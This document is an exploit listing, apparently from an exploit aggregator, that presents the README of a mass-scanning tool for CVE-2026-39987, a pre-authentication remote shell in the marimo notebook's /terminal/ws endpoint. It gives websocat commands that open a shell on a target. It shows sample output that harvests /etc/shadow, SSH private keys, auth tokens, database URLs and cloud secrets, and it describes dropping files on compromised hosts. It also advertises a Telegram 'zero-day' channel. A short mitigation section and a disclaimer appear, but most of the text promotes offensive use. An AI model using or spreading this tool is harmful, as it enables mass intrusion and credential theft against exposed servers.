Exploit for CVE-2026-39987

## https://sploitus.com/exploit?id=BDEBC7BC-574F-53BD-A9D7-7CD41789525A
# CVE-2026-39987
marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability



```
   ___  _        ___     __  __  __  __      ___  __  __  _______
  / (_)(_|   |_// (_)   /  )/  \/  )/       /   \/  |/  |/  \   /
 |       |   |  \__       /|    | /| __       __/\_/|\_/|\__/  / 
 |       |   |  /   -----/ |    |/ |/  \-----   \   |   |/  \ /  
  \___/   \_/   \___/   /___\__//___\__/    \___/   |   |\__//   
```

# CVE-2026-39987
### Marimo `/terminal/ws` — Unauthenticated WebSocket Pre-Auth RCE
### Mass Scanner · Full Enumeration · Smart Detection



![Python](https://img.shields.io/badge/Python-3.10%2B-brightgreen?style=for-the-badge&logo=python&logoColor=white)
![CVE](https://img.shields.io/badge/CVE-2026--39987-red?style=for-the-badge)
![Severity](https://img.shields.io/badge/Severity-CRITICAL-red?style=for-the-badge)
![Type](https://img.shields.io/badge/Type-Pre--Auth%20RCE-orange?style=for-the-badge)
![Platform](https://img.shields.io/badge/Platform-Linux%20%7C%20macOS-blue?style=for-the-badge)
![License](https://img.shields.io/badge/License-Educational-yellow?style=for-the-badge)



**Author:** [Nxploited](https://github.com/Nxploited)  ·  **Telegram:** [@KNxploited](https://t.me/KNxploited)



---

> ### 📢 Join the Telegram channel for the latest free zero-days & exploits:
> ## 🔗 [Nxploited ZeroDay Hub — t.me/KNxploited](https://t.me/KNxploited)

---

## 📖 Overview

**CVE-2026-39987** is a **critical Pre-Authentication Remote Code Execution** vulnerability affecting **Marimo**, an open-source reactive Python notebook platform.

The terminal WebSocket endpoint `/terminal/ws` completely lacks authentication validation, allowing any **unauthenticated remote attacker** to obtain a **full PTY shell** and execute arbitrary system commands with the privileges of the running process — often `root` inside containerized deployments.

Unlike other WebSocket endpoints such as `/ws`, which correctly invoke `validate_auth()` before accepting connections, the `/terminal/ws` endpoint only verifies the running mode and platform compatibility, **entirely skipping authentication**.

> ✅ **Patched in:** `marimo >= 0.23.0`
> ❌ **All versions prior to `0.23.0` are vulnerable**

---

## 🔍 Vulnerability Details

| Property | Value |
|---|---|
| **CVE ID** | CVE-2026-39987 |
| **Affected Software** | marimo  Supported formats: bare IP · IP:port · domain · domain:port · `http://` · `https://` · `ws://` · `wss://`

---

### Step 2 — Launch the scanner

```bash
python3 CVE-2026-39987.py
```

---

### Step 3 — Interactive configuration

```
  ▸ Targets file  (default: targets.txt) : targets.txt
  ▸ Threads       (default: 50)          : 100
```

> Thread range: 1–300. Recommended: 50–150 depending on your network.

---

## 🖥️ Output Preview

### Terminal UI

```
  ╭──────────────────────────────────────────────────────────╮
  │ CVE-2026-39987  ·  Marimo WebSocket RCE                  │
  │ MASS SCANNER  ·  FULL ENUM  ·  SMART DETECT              │
  │ By: Nxploited  ·  github.com/Nxploited  ·  @KNxploited   │
  ╰──────────────────────────────────────────────────────────╯

  ══════════════ ws://192.168.1.100:2718/terminal/ws ══════════

  ╭────────────────────────────────────────╮
  │  ◈◈◈  ROOT ACCESS  ◈◈◈                │
  │  ws://192.168.1.100:2718               │
  │  uid ▸  uid=0(root)  groups=[root]     │
  ╰────────────────────────────────────────╯

  ──  ENVIRONMENT  ──────────────────────────────────────────
    ✦  Type                  MARIMO
    ◈  Docker                True
    ◈  Marimo version        0.22.1
    ◈  Notebook directory    /app/notebooks

  ──  MARIMO — NOTEBOOKS  ───────────────────────────────────
    ✦  Notebooks             7 found
       ·                     /app/notebooks/analysis.py
       ·                     /app/notebooks/data_pipeline.py
       ·                     /app/notebooks/etl_job.py

  ──  MARIMO — TOKENS  ──────────────────────────────────────
    ✦  Token CLI             secret-token-abc123xyz
    ✦  .marimo.toml          /root/.marimo.toml

  ──  /etc  SENSITIVE  ──────────────────────────────────────
    ✦  /etc/shadow           READABLE  [42 entries]
    ◈  /etc/passwd           [42 lines]
    ◈  /etc/crontab          [12 lines]

  ──  SSH KEYS  ─────────────────────────────────────────────
    ✦  /root/.ssh/id_rsa     FOUND
    ✦  /root/.ssh/id_ed25519 FOUND

  ──  DATABASES  ────────────────────────────────────────────
    ✦  MySQL                 DATABASES LISTED
    ✦  Redis                 PONG — NO AUTH
    ✦  DuckDB files          /app/notebooks/data.duckdb

  ──  SENSITIVE ENV VARS  ───────────────────────────────────
    ✦  DATABASE_URL          postgresql://admin:p4ss@db:5432/prod
    ✦  AWS_SECRET_ACCESS_KEY redacted...

  ──  NX FILE DROP  ──────────────────────────────��──────────
    ✦  Shell write           /app/notebooks/Nx.py
    ✦  HTTP access           http://192.168.1.100:2718/Nx.py

  ──  COMPLETE  ─────────────────────────────────────────────
    ◈  Saved to              nx_output/192.168.1.100_2718/

  ◦ 73/200  ROOT:5  PRIV:11  SHELL:18  FAIL:39  6.3/s
```

---

### Live Progress

```
  ◦ 73/200  ROOT:5  PRIV:11  SHELL:18  FAIL:39  6.3/s
```

---

## 📁 Output Structure

```
nx_output/
│
├── summary.txt                    ← Master summary of all targets
├── curls.txt                      ← websocat one-liners for all shells
├── Nx.txt                         ← HTTP-confirmed file drops
│
└── 192.168.1.100_2718/            ← Per-target directory
    ├── summary.txt                ← Target summary & connect command
    ├── identity.txt               ← id · whoami · uname · hostname · shell
    ├── users.txt                  ← /etc/passwd · shadow · sudoers · last
    ├── ssh_keys.txt               ← Discovered SSH private keys & auth keys
    ├── etc_data.txt               ← /etc/hosts · resolv.conf · crontab · env
    ├── env_sensitive.txt          ← Filtered sensitive environment variables
    ├── databases.txt              ← MySQL · Redis · PostgreSQL · config files
    ├── app_configs.txt            ← .env · wp-config.php · settings.py · etc
    ├── notebooks.txt              ← Full content of all Marimo notebooks
    ├── marimo_toml.txt            ← .marimo.toml configuration files
    ├── marimo_tokens.txt          ← All extracted Marimo auth tokens
    ├── dotenv.txt                 ← .env / .env.local / .env.production
    ├── databases_marimo.txt       ← DuckDB · SQLite · DB URLs from notebooks
    ├── webserver_configs.txt      ← Apache/Nginx VirtualHosts & configs
    ├── network.txt                ← Interfaces · routes · open ports · iptables
    ├── processes.txt              ← ps aux · crontab · cron.d · systemd units
    ├── logs.txt                   ← auth.log · syslog · access.log · error.log
    ├── nx_file.txt                ← Nx drop path · web root · HTTP URL
    └── software.txt               ← PHP · Python · Node.js versions
```

---

## 📊 Access Levels

| Icon | Level | Description |
|---|---|---|
| `✦✦✦` 🟢 | **ROOT** | `uid=0` — Full root access |
| `✦✦` 🟡 | **PRIV** | Member of `sudo` · `wheel` · `docker` · `disk` · `adm` |
| `✦` 🔵 | **SHELL** | Unprivileged shell access |
| `✗` 🔴 | **FAIL** | Connection refused · timeout · HTTP error |

---

## 🌍 Supported Environments

| Environment | Auto-Detected | Specialized Collection |
|---|---|---|
| 🟣 **Marimo** | ✅ | Notebooks · Tokens · DuckDB · `.marimo.toml` · mounts |
| 🔵 **cPanel / WHM** | ✅ | `userdomains` · MySQL password · WHM user list |
| 🟠 **Plesk** | ✅ | `psa.shadow` · vhosts · MySQL admin credentials |
| 🌐 **Apache** | ✅ | VirtualHosts · `sites-enabled` · access/error logs |
| 🟢 **Nginx** | ✅ | Server blocks · `conf.d` · access/error logs |
| 🐍 **Python App** | ✅ | `.env` · `settings.py` · `config.py` · Pipfile |
| 🟡 **Node.js** | ✅ | `.env` · `package.json` · public directory |
| 🐳 **Docker** | ✅ | Bind mounts · container-local storage detection |
| ⚙️ **Generic** | ✅ | Full enumeration suite on unknown environments |

---

## 🔌 Manual Connection

Once a vulnerable target is identified, connect manually using `websocat`:

```bash
# Install websocat
cargo install websocat
# or: https://github.com/vi/websocat/releases

# Connect to shell
websocat "ws://TARGET:2718/terminal/ws" -H "Authorization: Bearer any-value"

# Connect over TLS
websocat "wss://TARGET/terminal/ws" -H "Authorization: Bearer any-value"
```

> The `Authorization` header value is irrelevant — the endpoint accepts any or no token.

---

## 🛡️ Mitigation

If you are running Marimo in a production or exposed environment:

1. **Upgrade immediately** to `marimo >= 0.23.0`
2. Place Marimo behind an authenticated reverse proxy (Nginx + BasicAuth / OAuth2 proxy)
3. Bind Marimo only to `127.0.0.1` — never expose it directly to the internet
4. Use firewall rules to restrict `/terminal/ws` access
5. Audit your deployment for exposed instances

---

## ⚠️ Disclaimer

> **This tool is provided strictly for educational purposes, authorized penetration testing, and legitimate security research.**

You **must** have explicit written permission from the system owner before running this tool against any target. Unauthorized use against systems you do not own or have permission to test is **illegal** and may result in civil and/or criminal prosecution under applicable computer crime laws, including but not limited to the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act, EU cybercrime directives, and equivalent legislation in your jurisdiction.

The author accepts **no liability** for any damage, data loss, or legal consequences arising from misuse of this tool.

**Use responsibly. Hack ethically.**

---

## 👤 Author



| | |
|---|---|
| **Handle** | Nxploited |
| **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |
| **Channel** | [Nxploited ZeroDay Hub](https://t.me/KNxploited) |



---

> *"The quieter you become, the more you are able to hear."*



⭐ **If this tool was useful, drop a star and join the channel for more zero-days!** ⭐

### 🔗 [t.me/KNxploited](https://t.me/KNxploited)